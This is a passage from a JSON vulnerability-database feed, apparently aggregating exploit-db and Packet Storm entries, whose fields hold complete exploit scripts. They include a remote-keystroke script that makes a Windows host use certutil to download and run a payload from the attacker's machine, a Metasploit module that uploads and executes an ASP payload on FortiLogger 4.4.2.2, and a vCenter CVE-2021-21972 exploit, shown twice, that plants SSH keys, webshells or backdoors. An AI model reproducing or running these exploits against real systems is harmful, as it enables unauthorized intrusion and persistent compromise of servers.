\":\"20\",\"+\":\"2b\",\"=\":\"3d\",\"/\":\"2f\",\"_\":\"5f\",\"<\":\"3c\",\r\n\t\">\":\"3e\",\"[\":\"5b\",\"]\":\"5d\",\"!\":\"21\",\"@\":\"40\",\"#\":\"23\",\"$\":\"24\",\"%\":\"25\",\"^\":\"5e\",\"&\":\"26\",\"*\":\"2a\",\r\n\t\"(\":\"28\",\")\":\"29\",\"-\":\"2d\",\"'\":\"27\",'\"':\"22\",\":\":\"3a\",\";\":\"3b\",\"?\":\"3f\",\"`\":\"60\",\"~\":\"7e\",\r\n\t\"\\\\\":\"5c\",\"|\":\"7c\",\"{\":\"7b\",\"}\":\"7d\",\",\":\"2c\",\".\":\"2e\"}\r\n\r\n\r\ndef openCMD():\r\n\ttarget.sendto(\"6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a\".decode(\"hex\"), (rhost,port)) # openfile /C/Windows/System32/cmd.exe\r\n\r\ndef SendString(string):\r\n\tfor char in string:\r\n\t\ttarget.sendto((\"7574663820\" + characters[char] + \"0a\").decode(\"hex\"),(rhost,port)) # Sends Character hex with packet padding\r\n\t\tsleep(0.03)\r\n\r\ndef SendReturn():\r\n\ttarget.sendto(\"6b657920203352544e\".decode(\"hex\"),(rhost,port)) # 'key 3RTN' - Similar to 'Remote Mouse' mobile app\r\n\tsleep(0.5)\r\n\r\ndef exploit():\r\n\tprint(\"[+] 3..2..1..\")\r\n\tsleep(2)\r\n\topenCMD()\r\n\tprint(\"[+] *Super fast hacker typing*\")\r\n\tsleep(1)\r\n\tSendString(\"certutil.exe -urlcache -f http://\" + lhost + \"/\" + payload + \" C:\\\\Windows\\\\Temp\\\\\" + payload)\r\n\tSendReturn()\r\n\tprint(\"[+] Retrieving payload\")\r\n\tsleep(3)\r\n\tSendString(\"C:\\\\Windows\\\\Temp\\\\\" + payload)\r\n\tSendReturn()\r\n\tprint(\"[+] Done! Check Your Listener?\")\r\n\r\n\r\ndef main():\r\n\ttarget.connect((rhost,port))\r\n\texploit()\r\n\ttarget.close()\r\n\texit()\r\n\r\nif __name__==\"__main__\":\r\n\tmain()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49601"}, {"lastseen": "2021-03-01T10:39:58", "description": "", "published": "2021-03-01T00:00:00", "type": "exploitdb", "title": "FortiLogger 4.4.2.2 - Unauthenticated Arbitrary File Upload (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-3378"], "modified": "2021-03-01T00:00:00", "id": "EDB-ID:49600", "href": "https://www.exploit-db.com/exploits/49600", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::EXE\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'FortiLogger Arbitrary File Upload Exploit',\r\n 'Description' => %q{\r\n This module exploits an unauthenticated arbitrary file upload\r\n via insecure POST request. It has been tested on version 4.4.2.2 in\r\n Windows 10 Enterprise.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Berkan Er <b3rsec@protonmail.com>' # Vulnerability discovery, PoC and Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2021-3378'],\r\n ['URL', 'https://erberkan.github.io/2021/cve-2021-3378/']\r\n ],\r\n\r\n 'Platform' => ['win'],\r\n 'Privileged' => false,\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Targets' =>\r\n [\r\n [\r\n 'FortiLogger - 4.4.2.2',\r\n {\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n ],\r\n 'DisclosureDate' => '2021-02-26',\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(5000),\r\n OptString.new('TARGETURI', [true, 'The base path to the FortiLogger', '/'])\r\n ], self.class\r\n )\r\n end\r\n\r\n def check_product_info\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, '/shared/GetProductInfo'),\r\n 'method' => 'POST',\r\n 'data' => '',\r\n 'headers' => {\r\n 'Accept' => 'application/json, text/javascript, */*; q=0.01',\r\n 'Accept-Language' => 'en-US,en;q=0.5',\r\n 'Accept-Encoding' => 'gzip, deflate',\r\n 'X-Requested-With' => 'XMLHttpRequest'\r\n }\r\n )\r\n\r\n return res\r\n end\r\n\r\n def check\r\n begin\r\n res = check_product_info\r\n if res && res.code == 200\r\n if JSON.parse(res.body)['Version'] == '4.4.2.2'\r\n Exploit::CheckCode::Vulnerable\r\n else\r\n Exploit::CheckCode::Safe\r\n end\r\n end\r\n end\r\n end\r\n\r\n def create_payload\r\n Msf::Util::EXE.to_exe_asp(generate_payload_exe).to_s\r\n end\r\n\r\n def exploit\r\n begin\r\n print_good('Generate Payload !')\r\n data = create_payload\r\n\r\n boundary = \"----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}\"\r\n post_data = \"--#{boundary}\\r\\n\"\r\n post_data << \"Content-Disposition: form-data; name=\\\"file\\\"; filename=\\\"b3r.asp\\\"\\r\\n\"\r\n post_data << \"Content-Type: image/png\\r\\n\"\r\n post_data << \"\\r\\n#{data}\\r\\n\"\r\n post_data << \"--#{boundary}\\r\\n\"\r\n\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '/Config/SaveUploadedHotspotLogoFile'),\r\n 'ctype' => \"multipart/form-data; boundary=#{boundary}\",\r\n 'data' => post_data,\r\n 'headers' => {\r\n 'Accept' => 'application/json',\r\n 'Accept-Language' => 'en-US,en;q=0.5',\r\n 'X-Requested-With' => 'XMLHttpRequest'\r\n }\r\n )\r\n if res && res.code == 200\r\n if JSON.parse(res.body)['Message'] == 'Error in saving file'\r\n print_error('Error for upload payload..')\r\n else\r\n print_good('Payload has been uploaded !')\r\n\r\n handler\r\n\r\n print_status('Executing payload...')\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, '/Assets/temp/hotspot/img/logohotspot.asp'),\r\n 'method' => 'GET'\r\n }, 5)\r\n end\r\n end\r\n end\r\n end\r\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/49600"}, {"lastseen": "2021-03-01T10:39:58", "description": "", "published": "2021-03-01T00:00:00", "type": "exploitdb", "title": "VMware vCenter Server 7.0 - Unauthenticated File Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-21972"], "modified": "2021-03-01T00:00:00", "id": "EDB-ID:49602", "href": "https://www.exploit-db.com/exploits/49602", "sourceData": "# Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload\r\n# Date: 2021-02-27\r\n# Exploit Author: Photubias\r\n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html\r\n# Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517)\r\n# Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds\r\n# CVE: CVE-2021-21972\r\n\r\n#!/usr/bin/env python3\r\n'''\r\n Copyright 2021 Photubias(c) \r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n \r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n \r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see <http://www.gnu.org/licenses/>.\r\n \r\n File name CVE-2021-21972.py\r\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\r\n\r\n CVE-2021-21972 is an unauthenticated file upload and overwrite,\r\n exploitation can be done via SSH public key upload or a webshell\r\n The webshell must be of type JSP, and its success depends heavily on the specific vCenter version\r\n \r\n # Manual verification: https://<ip>/ui/vropspluginui/rest/services/checkmobregister\r\n # A white page means vulnerable\r\n # A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet)\r\n # Notes:\r\n # * On Linux SSH key upload is always best, when SSH access is possible & enabled\r\n # * On Linux the upload is done as user vsphere-ui:users\r\n # * On Windows the upload is done as system user\r\n # * vCenter 6.5 <=7515524 does not contain the vulnerable component \"vropspluginui\"\r\n # * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload\r\n \r\n This is a native implementation without requirements, written in Python 3.\r\n Works equally well on Windows as Linux (as MacOS, probably ;-)\r\n \r\n Features: vulnerability checker + exploit\r\n'''\r\n\r\nimport os, tarfile, sys, optparse, requests\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\nlProxy = {}\r\nSM_TEMPLATE = b'''<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\r\n <env:Body>\r\n <RetrieveServiceContent xmlns=\"urn:vim25\">\r\n <_this type=\"ServiceInstance\">ServiceInstance</_this>\r\n </RetrieveServiceContent>\r\n </env:Body>\r\n </env:Envelope>'''\r\nsURL = sFile = sRpath = sType = None\r\n\r\ndef parseArguments(options):\r\n global sURL, sFile, sType, sRpath, lProxy\r\n if not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.')\r\n sURL = options.url\r\n if sURL[-1:] == '/': sURL = sURL[:-1]\r\n if not sURL[:4].lower() == 'http': sURL = 'https://' + sURL\r\n sFile = options.file\r\n if not os.path.exists(sFile): exit('[-] File not found: ' + sFile)\r\n sType = 'ssh'\r\n if options.type: sType = options.type\r\n if options.rpath: sRpath = options.rpath\r\n else: sRpath = None\r\n if options.proxy: lProxy = {'https': options.proxy}\r\n\r\ndef getVersion(sURL):\r\n def getValue(sResponse, sTag = 'vendor'):\r\n try: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0]\r\n except: pass\r\n return ''\r\n oResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE)\r\n #print(oResponse.text)\r\n if oResponse.status_code == 200:\r\n sResult = oResponse.text\r\n if not 'VMware' in getValue(sResult, 'vendor'):\r\n exit('[-] Not a VMware system: ' + sURL)\r\n else:\r\n sName = getValue(sResult, 'name')\r\n sVersion = getValue(sResult, 'version') # e.g. 7.0.0\r\n sBuild = getValue(sResult, 'build') # e.g. 15934073\r\n sFull = getValue(sResult, 'fullName')\r\n print('[+] Identified: ' + sFull)\r\n return sVersion, sBuild\r\n exit('[-] Not a VMware system: ' + sURL)\r\n\r\ndef verify(sURL):\r\n #return True\r\n sURL += '/ui/vropspluginui/rest/services/uploadova'\r\n try:\r\n oResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5)\r\n except:\r\n exit('[-] System not available: ' + sURL)\r\n if oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely\r\n else: return False\r\n\r\ndef createTarLin(sFile, sType, sVersion, sBuild, sRpath = None):\r\n def getResourcePath():\r\n oResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5)\r\n return oResponse.text.split('static/')[1].split('/')[0]\r\n oTar = tarfile.open('payloadLin.tar','w')\r\n if sRpath: ## version & build not important\r\n if sRpath[0] == '/': sRpath = sRpath[1:]\r\n sPayloadPath = '../../' + sRpath\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'absolute'\r\n elif sType.lower() == 'ssh': ## version & build not important\r\n sPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys'\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'ssh'\r\n elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631):\r\n ## vCenter 6.5/6.7 < 13010631, just this location with a subnumber\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n for i in range(112): oTar.add(sFile, arcname=sPayloadPath % i)\r\n oTar.close()\r\n return 'webshell'\r\n elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631):\r\n ## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/<thefile>\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'backdoor'\r\n else: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0):\r\n ## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/<thefile>)\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'backdoor'\r\n \r\n\r\ndef createTarWin(sFile, sRpath = None):\r\n ## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows\r\n if sRpath:\r\n if sRpath[0] == '/': sRpath = sRpath[:1]\r\n sPayloadPath = '../../' + sRpath\r\n else:\r\n sPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile)\r\n oTar = tarfile.open('payloadWin.tar','w')\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n\r\ndef uploadFile(sURL, sUploadType, sFile):\r\n #print('[!] Uploading ' + sFile)\r\n sFile = os.path.basename(sFile)\r\n sUploadURL = sURL + '/ui/vropspluginui/rest/services/uploadova'\r\n arrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')}\r\n ## Linux\r\n oResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy)\r\n if oResponse.status_code == 200:\r\n if oResponse.text == 'SUCCESS':\r\n print('[+] Linux payload uploaded succesfully.')\r\n if sUploadType == 'ssh':\r\n print('[+] SSH key installed for user \\'vsphere-ui\\'.')\r\n print(' Please run \\'ssh vsphere-ui@' + sURL.replace('https://','') + '\\'')\r\n return True\r\n elif sUploadType == 'webshell':\r\n sWebshell = sURL + '/ui/resources/' + sFile\r\n #print('testing ' + sWebshell)\r\n oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)\r\n if oResponse.status_code != 404:\r\n print('[+] Webshell verified, please visit: ' + sWebshell)\r\n return True\r\n elif sUploadType == 'backdoor':\r\n sWebshell = sURL + '/ui/resources/' + sFile\r\n print('[+] Backdoor ready, please reboot or wait for a reboot')\r\n print(' then open: ' + sWebshell)\r\n else: ## absolute\r\n pass\r\n ## Windows\r\n arrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')}\r\n oResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy)\r\n if oResponse.status_code == 200:\r\n if oResponse.text == 'SUCCESS':\r\n print('[+] Windows payload uploaded succesfully.')\r\n if sUploadType == 'backdoor':\r\n print('[+] Absolute upload looks OK')\r\n return True\r\n else:\r\n sWebshell = sURL + '/statsreport/' + sFile\r\n oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)\r\n if oResponse.status_code != 404:\r\n print('[+] Webshell verified, please visit: ' + sWebshell)\r\n return True\r\n return False\r\n\r\nif __name__ == \"__main__\":\r\n usage = (\r\n 'Usage: %prog [option]\\n'\r\n 'Exploiting Windows & Linux vCenter Server\\n'\r\n 'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \\'\\'\\n'\r\n 'Note1: Since the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\\n'\r\n 'Note2: Windows is the most vulnerable, but less mostly deprecated anyway')\r\n\r\n parser = optparse.OptionParser(usage=usage)\r\n parser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1')\r\n parser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell')\r\n parser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh')\r\n parser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile')\r\n parser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1:8080')\r\n \r\n (options, args) = parser.parse_args()\r\n \r\n parseArguments(options)\r\n \r\n ## Verify\r\n if verify(sURL): print('[+] Target vulnerable: ' + sURL)\r\n else: exit('[-] Target not vulnerable: ' + sURL)\r\n \r\n ## Read out the version\r\n sVersion, sBuild = getVersion(sURL)\r\n if sRpath: print('[!] Ready to upload your file to ' + sRpath)\r\n elif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \\'' + sFile + '\\'')\r\n else: print('[!] Ready to upload webshell \\'' + sFile + '\\'')\r\n sAns = input('[?] Want to exploit? [y/N]: ')\r\n if not sAns or not sAns[0].lower() == 'y': exit()\r\n \r\n ## Create TAR file\r\n sUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath)\r\n if not sUploadType == 'ssh': createTarWin(sFile, sRpath)\r\n\r\n ## Upload and verify\r\n uploadFile(sURL, sUploadType, sFile)\r\n \r\n ## Cleanup\r\n os.remove('payloadLin.tar')\r\n os.remove('payloadWin.tar')", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49602"}], "packetstorm": [{"lastseen": "2021-03-01T16:09:17", "description": "", "published": "2021-03-01T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server 7.0 Arbitrary File Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-21972"], "modified": "2021-03-01T00:00:00", "id": "PACKETSTORM:161590", "href": "https://packetstormsecurity.com/files/161590/VMware-vCenter-Server-7.0-Arbitrary-File-Upload.html", "sourceData": "`# Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload \n# Date: 2021-02-27 \n# Exploit Author: Photubias \n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html \n# Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517) \n# Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds \n# CVE: CVE-2021-21972 \n \n#!/usr/bin/env python3 \n''' \nCopyright 2021 Photubias(c) \nThis program is free software: you can redistribute it and/or modify \nit under the terms of the GNU General Public License as published by \nthe Free Software Foundation, either version 3 of the License, or \n(at your option) any later version. \n \nThis program is distributed in the hope that it will be useful, \nbut WITHOUT ANY WARRANTY; without even the implied warranty of \nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \nGNU General Public License for more details. \n \nYou should have received a copy of the GNU General Public License \nalong with this program. If not, see <http://www.gnu.org/licenses/>. \n \nFile name CVE-2021-21972.py \nwritten by tijl[dot]deneut[at]howest[dot]be for www.ic4.be \n \nCVE-2021-21972 is an unauthenticated file upload and overwrite, \nexploitation can be done via SSH public key upload or a webshell \nThe webshell must be of type JSP, and its success depends heavily on the specific vCenter version \n \n# Manual verification: https://<ip>/ui/vropspluginui/rest/services/checkmobregister \n# A white page means vulnerable \n# A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet) \n# Notes: \n# * On Linux SSH key upload is always best, when SSH access is possible & enabled \n# * On Linux the upload is done as user vsphere-ui:users \n# * On Windows the upload is done as system user \n# * vCenter 6.5 <=7515524 does not contain the vulnerable component \"vropspluginui\" \n# * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload \n \nThis is a native implementation without requirements, written in Python 3. \nWorks equally well on Windows as Linux (as MacOS, probably ;-) \n \nFeatures: vulnerability checker + exploit \n''' \n \nimport os, tarfile, sys, optparse, requests \nrequests.packages.urllib3.disable_warnings() \n \nlProxy = {} \nSM_TEMPLATE = b'''<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"> \n<env:Body> \n<RetrieveServiceContent xmlns=\"urn:vim25\"> \n<_this type=\"ServiceInstance\">ServiceInstance</_this> \n</RetrieveServiceContent> \n</env:Body> \n</env:Envelope>''' \nsURL = sFile = sRpath = sType = None \n \ndef parseArguments(options): \nglobal sURL, sFile, sType, sRpath, lProxy \nif not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.') \nsURL = options.url \nif sURL[-1:] == '/': sURL = sURL[:-1] \nif not sURL[:4].lower() == 'http': sURL = 'https://' + sURL \nsFile = options.file \nif not os.path.exists(sFile): exit('[-] File not found: ' + sFile) \nsType = 'ssh' \nif options.type: sType = options.type \nif options.rpath: sRpath = options.rpath \nelse: sRpath = None \nif options.proxy: lProxy = {'https': options.proxy} \n \ndef getVersion(sURL): \ndef getValue(sResponse, sTag = 'vendor'): \ntry: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0] \nexcept: pass \nreturn '' \noResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE) \n#print(oResponse.text) \nif oResponse.status_code == 200: \nsResult = oResponse.text \nif not 'VMware' in getValue(sResult, 'vendor'): \nexit('[-] Not a VMware system: ' + sURL) \nelse: \nsName = getValue(sResult, 'name') \nsVersion = getValue(sResult, 'version') # e.g. 7.0.0 \nsBuild = getValue(sResult, 'build') # e.g. 15934073 \nsFull = getValue(sResult, 'fullName') \nprint('[+] Identified: ' + sFull) \nreturn sVersion, sBuild \nexit('[-] Not a VMware system: ' + sURL) \n \ndef verify(sURL): \n#return True \nsURL += '/ui/vropspluginui/rest/services/uploadova' \ntry: \noResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5) \nexcept: \nexit('[-] System not available: ' + sURL) \nif oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely \nelse: return False \n \ndef createTarLin(sFile, sType, sVersion, sBuild, sRpath = None): \ndef getResourcePath(): \noResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5) \nreturn oResponse.text.split('static/')[1].split('/')[0] \noTar = tarfile.open('payloadLin.tar','w') \nif sRpath: ## version & build not important \nif sRpath[0] == '/': sRpath = sRpath[1:] \nsPayloadPath = '../../' + sRpath \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'absolute' \nelif sType.lower() == 'ssh': ## version & build not important \nsPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys' \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'ssh' \nelif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631): \n## vCenter 6.5/6.7 < 13010631, just this location with a subnumber \nsPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile) \nprint('[!] Selected uploadpath: ' + sPayloadPath[5:]) \nfor i in range(112): oTar.add(sFile, arcname=sPayloadPath % i) \noTar.close() \nreturn 'webshell' \nelif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631): \n## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/<thefile> \nsPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile) \nprint('[!] Selected uploadpath: ' + sPayloadPath[5:]) \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'backdoor' \nelse: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0): \n## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/<thefile>) \nsPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile) \nprint('[!] Selected uploadpath: ' + sPayloadPath[5:]) \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \nreturn 'backdoor' \n \n \ndef createTarWin(sFile, sRpath = None): \n## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows \nif sRpath: \nif sRpath[0] == '/': sRpath = sRpath[:1] \nsPayloadPath = '../../' + sRpath \nelse: \nsPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile) \noTar = tarfile.open('payloadWin.tar','w') \noTar.add(sFile, arcname=sPayloadPath) \noTar.close() \n \ndef uploadFile(sURL, sUploadType, sFile): \n#print('[!] Uploading ' + sFile) \nsFile = os.path.basename(sFile) \nsUploadURL = sURL + '/ui/vropspluginui/rest/services/uploadova' \narrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')} \n## Linux \noResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy) \nif oResponse.status_code == 200: \nif oResponse.text == 'SUCCESS': \nprint('[+] Linux payload uploaded succesfully.') \nif sUploadType == 'ssh': \nprint('[+] SSH key installed for user \\'vsphere-ui\\'.') \nprint(' Please run \\'ssh vsphere-ui@' + sURL.replace('https://','') + '\\'') \nreturn True \nelif sUploadType == 'webshell': \nsWebshell = sURL + '/ui/resources/' + sFile \n#print('testing ' + sWebshell) \noResponse = requests.get(sWebshell, verify=False, proxies = lProxy) \nif oResponse.status_code != 404: \nprint('[+] Webshell verified, please visit: ' + sWebshell) \nreturn True \nelif sUploadType == 'backdoor': \nsWebshell = sURL + '/ui/resources/' + sFile \nprint('[+] Backdoor ready, please reboot or wait for a reboot') \nprint(' then open: ' + sWebshell) \nelse: ## absolute \npass \n## Windows \narrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')} \noResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy) \nif oResponse.status_code == 200: \nif oResponse.text == 'SUCCESS': \nprint('[+] Windows payload uploaded succesfully.') \nif sUploadType == 'backdoor': \nprint('[+] Absolute upload looks OK') \nreturn True \nelse: \nsWebshell = sURL + '/statsreport/' + sFile \noResponse = requests.get(sWebshell, verify=False, proxies = lProxy) \nif oResponse.status_code != 404: \nprint('[+] Webshell verified, please visit: ' + sWebshell) \nreturn True \nreturn False \n \nif __name__ == \"__main__\": \nusage = ( \n'Usage: %prog [option]\\n' \n'Exploiting Windows & Linux vCenter Server\\n' \n'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \\'\\'\\n' \n'Note1: Since the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\\n' \n'Note2: Windows is the most vulnerable, but less mostly deprecated anyway') \n \nparser = optparse.OptionParser(usage=usage) \nparser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1') \nparser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell') \nparser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh') \nparser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile') \nparser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1:8080') \n \n(options, args) = parser.parse_args() \n \nparseArguments(options) \n \n## Verify \nif verify(sURL): print('[+] Target vulnerable: ' + sURL) \nelse: exit('[-] Target not vulnerable: ' + sURL) \n \n## Read out the version \nsVersion, sBuild = getVersion(sURL) \nif sRpath: print('[!] Ready to upload your file to ' + sRpath) \nelif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \\'' + sFile + '\\'') \nelse: print('[!] Ready to upload webshell \\'' + sFile + '\\'') \nsAns = input('[?] Want to exploit? [y/N]: ') \nif not sAns or not sAns[0].lower() == 'y': exit() \n \n## Create TAR file \nsUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath) \nif not sUploadType == 'ssh': createTarWin(sFile, sRpath) \n \n## Upload and verify \nuploadFile(sURL, sUploadType, sFile) \n \n## Cleanup \nos.remove('payloadLin.tar') \nos.remove('payloadWin.tar') \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161590/vmwarevcenterserver70-upload.txt"}, {"lastseen": "2021-03-01T16:10:20", "description": "", "published": "2021-03-01T00:00:00", "type": "packetstorm", "title": "FortiLogger 4.4.2.2 Arbitrary File Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-3378"], "modified": "2021-03-01T00:00:00", "id": "PACKETSTORM:161601", "href": 